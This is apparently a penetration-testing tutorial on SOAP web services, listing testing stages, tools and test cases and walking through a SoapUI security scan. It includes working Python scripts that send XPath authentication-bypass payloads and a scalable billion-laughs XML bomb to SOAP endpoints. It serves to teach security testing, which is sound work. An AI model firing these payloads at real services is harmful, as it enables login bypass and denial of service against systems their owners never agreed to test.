Web Services and API Penetration Testing Part #2

Welcome readers to Part 2 of Web Services Penetration Testing.

In this part, we will take a quick look at the test cases, tools and methods used for security testing of web services.
Black box web services penetration testing prerequisite:

-> Web Services Description Language (WSDL) file
Grey box web services penetration testing prerequisites:

-> Sample requests/responses for each exposed method, along with the WSDL file.

Stages of penetration testing a web service:
1. Information gathering
2. Black box enumeration of the exposed endpoints and operations
3. Google hacking (using dorks, for example filetype:wsdl or inurl:wsdl, to discover web services exposed by hosts on the network)
4. UDDI (Universal Description, Discovery and Integration) registry lookups
5. Web service discovery (if no WSDL is provided)
6. Authentication type discovery
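The discovery stages above (finding a WSDL when none was handed over, pulling the operation list out of it, and identifying the authentication scheme) are mechanical enough to script. The following helper is an added example and not code from the original post; the candidate path list, the base URL and the sample WSDL are constructed placeholders, not taken from any real service.

```python
"""Added discovery helper for the stages listed above (not from the original post).

Assumptions: CANDIDATE_PATHS is a starting list of common WSDL locations;
SAMPLE_WSDL is a constructed document so the module runs offline."""
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

WSDL_NS = "http://schemas.xmlsoap.org/wsdl/"

# Typical WSDL locations on .NET (.asmx), Axis2, CXF and generic stacks.
# Assumption: extend per target; this is a seed list, not an exhaustive one.
CANDIDATE_PATHS = [
    "?wsdl", "?WSDL", "?singleWsdl",
    "/services", "/services/listServices", "/axis2/services/listServices",
    "/ws", "/soap", "/service.asmx?WSDL",
]


def candidate_wsdl_urls(base_url):
    """Return the URLs to probe when no WSDL was supplied (stage 5)."""
    base = base_url.rstrip("/")
    return [base + path for path in CANDIDATE_PATHS]


def looks_like_wsdl(body):
    """True if the response body parses as a WSDL <definitions> document."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return False
    return root.tag == "{%s}definitions" % WSDL_NS


def wsdl_operations(body):
    """Map each portType to its operation names: this is the attack surface."""
    root = ET.fromstring(body)
    ops = {}
    for port_type in root.findall("{%s}portType" % WSDL_NS):
        ops[port_type.get("name")] = [
            op.get("name") for op in port_type.findall("{%s}operation" % WSDL_NS)
        ]
    return ops


def auth_type(status, headers):
    """Classify the HTTP authentication scheme from a 401 challenge (stage 6).

    Anything that is not a 401 is either unauthenticated or uses
    application-level auth (e.g. WS-Security UsernameToken in the body)."""
    if status != 401:
        return "none-or-application-level"
    lowered = {k.lower(): v for k, v in headers.items()}
    challenge = lowered.get("www-authenticate", "")
    scheme = challenge.split(None, 1)[0] if challenge else ""
    known = {"Basic", "Digest", "NTLM", "Negotiate", "Bearer"}
    return scheme if scheme in known else "unknown"


def probe(url, timeout=5.0):
    """Fetch one URL and return (status, headers, body). Network-only helper."""
    req = urllib.request.Request(url, headers={"User-Agent": "ws-discovery"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except urllib.error.HTTPError as err:  # 401/403/404 still carry useful headers
        return err.code, dict(err.headers), err.read()


# Constructed sample WSDL (hypothetical service) so the functions can be exercised offline.
SAMPLE_WSDL = b"""<?xml version="1.0"?>
<definitions name="Accounts" xmlns="http://schemas.xmlsoap.org/wsdl/"
             targetNamespace="http://example.invalid/accounts">
  <portType name="AccountsPort">
    <operation name="getBalance"/>
    <operation name="transfer"/>
  </portType>
</definitions>"""


if __name__ == "__main__":
    for url in candidate_wsdl_urls("https://example.invalid"):
        print("candidate:", url)
    print(looks_like_wsdl(SAMPLE_WSDL), wsdl_operations(SAMPLE_WSDL))
    print(auth_type(401, {"WWW-Authenticate": 'Basic realm="ws"'}))
```

In a live engagement, loop `probe()` over `candidate_wsdl_urls()`, keep the responses for which `looks_like_wsdl()` is true, and feed the result of `wsdl_operations()` straight into your test-case list; `auth_type()` on the first 401 tells you whether you are facing Basic, NTLM or Negotiate before you start fuzzing.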

Testing Methodology:
-> Automated Testing Tools
• SoapUI Pro
• OWASP ZAP
• IBM AppScan
• HP WebInspect
• WSBang
• WSMap

-> Manual Testing Tools
• SoapUI (open source edition)
• Burp Suite Pro
• Postman (proxied through Burp)

-> Extensions:
• SAML Editor
• SAML Encoder / Decoder
• WSDL Wizard
• Wsdler
• SOA Client

Test cases to cover when testing web services:
• Fuzzing
• XSS / SQLi / malformed XML
• File upload
• XPath injection
• XML bomb (DoS through entity expansion)
• Authentication based attacks
• Replay attacks
• Session fixation
• XML Signature wrapping
• Session timeout
• TLS: cipher suite support, valid certificate, protocol version support
• Hashing algorithm support
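Several of the cases above (XML bomb, XPath injection, malformed XML) come down to crafting a raw SOAP request and watching how the endpoint behaves, which is exactly what you will do by hand in SoapUI or Burp. The script below is an added example and not code from the original post: it builds those requests and sends them, recording status and response time. The endpoint URL, the namespace and the operation names are hypothetical placeholders.

```python
"""Added example for the test-case list above (not from the original post).

Builds raw SOAP 1.1 requests for the XML bomb, XPath injection and malformed
XML cases and records how an endpoint reacts. NS, the operation names and the
target URL are assumed placeholders, not a real service."""
import time
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
NS = "http://example.invalid/accounts"  # assumption: target namespace from the WSDL


def envelope(body_xml, doctype=""):
    """Wrap pre-built body XML in a SOAP 1.1 envelope, optionally with a DTD prolog."""
    return (
        '<?xml version="1.0"?>%s<soapenv:Envelope xmlns:soapenv="%s" xmlns:ns="%s">'
        "<soapenv:Body>%s</soapenv:Body></soapenv:Envelope>"
        % (doctype, SOAP_ENV, NS, body_xml)
    )


def call(operation, params):
    """Normal request: &, < and > are escaped, so a payload arrives as text."""
    fields = "".join("<%s>%s</%s>" % (k, escape(str(v)), k) for k, v in params.items())
    return envelope("<ns:%s>%s</ns:%s>" % (operation, fields, operation))


def xpath_injection_requests(operation, user_field="username", pw_field="password"):
    """Classic XPath authentication-bypass strings, one full request per payload.
    Quotes are not escaped by escape(), so they reach the server verbatim."""
    payloads = [
        "' or '1'='1",
        "' or 1=1 or ''='",
        "admin' or name()='username' or 'x'='y",
        "x'] | //*[contains(name(),'pass')] | //user['x",
    ]
    return [(p, call(operation, {user_field: p, pw_field: "x"})) for p in payloads]


def xml_bomb(operation, depth=4, fanout=10):
    """Billion-laughs DTD: lolN expands to `fanout` copies of lol(N-1).
    depth=4 expands to ~30 KB (a safe probe); depth=9 is the classic ~3 GB bomb,
    only for an agreed DoS test."""
    entities = ['<!ENTITY lol0 "lol">']
    for i in range(1, depth + 1):
        entities.append('<!ENTITY lol%d "%s">' % (i, "&lol%d;" % (i - 1) * fanout))
    dtd = "<!DOCTYPE soapenv:Envelope [%s]>" % "".join(entities)
    return envelope("<ns:%s><id>&lol%d;</id></ns:%s>" % (operation, depth, operation), dtd)


def expansion_bytes(depth=4, fanout=10):
    """Bytes the parser must materialise if it expands the bomb (len('lol') == 3)."""
    return 3 * fanout ** depth


def malformed_requests(operation):
    """Malformed / structurally invalid cases built from a known-good request."""
    good = call(operation, {"id": "1"})
    return {
        "unclosed": good.replace("</soapenv:Body>", ""),           # not well-formed
        "control_char": call(operation, {"id": "1\x01"}),          # illegal XML char
        "duplicate_body": good.replace(                            # well-formed, invalid SOAP
            "</soapenv:Body>", "</soapenv:Body><soapenv:Body/>"),
    }


def is_well_formed(xml_text):
    """Sanity check on your own payloads: only the deliberately broken ones should fail."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


def send(url, xml_text, soap_action="", timeout=10.0):
    """POST one envelope; returns (status or None on timeout, seconds, body)."""
    req = urllib.request.Request(
        url, data=xml_text.encode("utf-8"), method="POST",
        headers={"Content-Type": "text/xml; charset=utf-8",
                 "SOAPAction": '"%s"' % soap_action})
    started = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read()
    except urllib.error.HTTPError as err:        # SOAP faults usually arrive as HTTP 500
        status, body = err.code, err.read()
    except (urllib.error.URLError, OSError):     # timeout: parser is likely expanding entities
        status, body = None, b""
    return status, time.monotonic() - started, body


if __name__ == "__main__":
    target = "https://example.invalid/services/Accounts"  # hypothetical endpoint
    cases = [("bomb", xml_bomb("getBalance"))] + list(malformed_requests("getBalance").items())
    for name, xml_text in cases:
        status, seconds, body = send(target, xml_text)
        print(name, status, "%.2fs" % seconds, body[:80])
```

What to look for: a slow or timed-out response to `xml_bomb()` at a depth that returns instantly on a hardened stack means the parser expands entities (and `expansion_bytes()` tells you how far you can push it); a SOAP fault that echoes the XPath payload, or a successful login with it, points at XPath injection; and the malformed cases should yield a clean fault, not a stack trace or a hang.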

Let's now take a look at how to perform an automated scan using SoapUI and get a preliminary, first-hand security report for the web service.

Using SoapUI Pro for security assessments (the Security Test feature is also available in the open-source edition):
1. Fire up SoapUI and create a functional TestCase for the operations you want to test.

(Screenshot: Creating testcase)

2. Add a Security Test to that TestCase.

(Screenshot: Adding security test)

3. Select the "Auto" mode to generate default Security Scans and Assertions for the TestSteps in your TestCase and press "Next":

(Screenshot: Generate Security Scan)

4. Press OK to create the Security Test with the described configuration and open the Security Test window:

(Screenshot: Execute Security Test)

5. Now run the Security Test.

(Screenshot: Run Security Test)

6. Once the scan finishes, dig deeper into the output of each scan, or generate a report for your assessment. Treat this as a first pass only: every finding an automated scan raises still needs manual verification before it goes into the report.

Practice VMs and labs with vulnerable web services:

• OWASP Mutillidae
• PentesterLab: Axis2 Web Service and Tomcat Manager
• DVWS (Damn Vulnerable Web Services)
• OWASP WebGoat

Part 3 of this series will focus on using Burp Suite and Postman, along with SoapUI, for manual testing of web services.

Stay hooked.

References and sources
https://www.owasp.org/index.php/REST_Assessment_Cheat_Sheet
https://www.soapui.org/security-testing/getting-started.html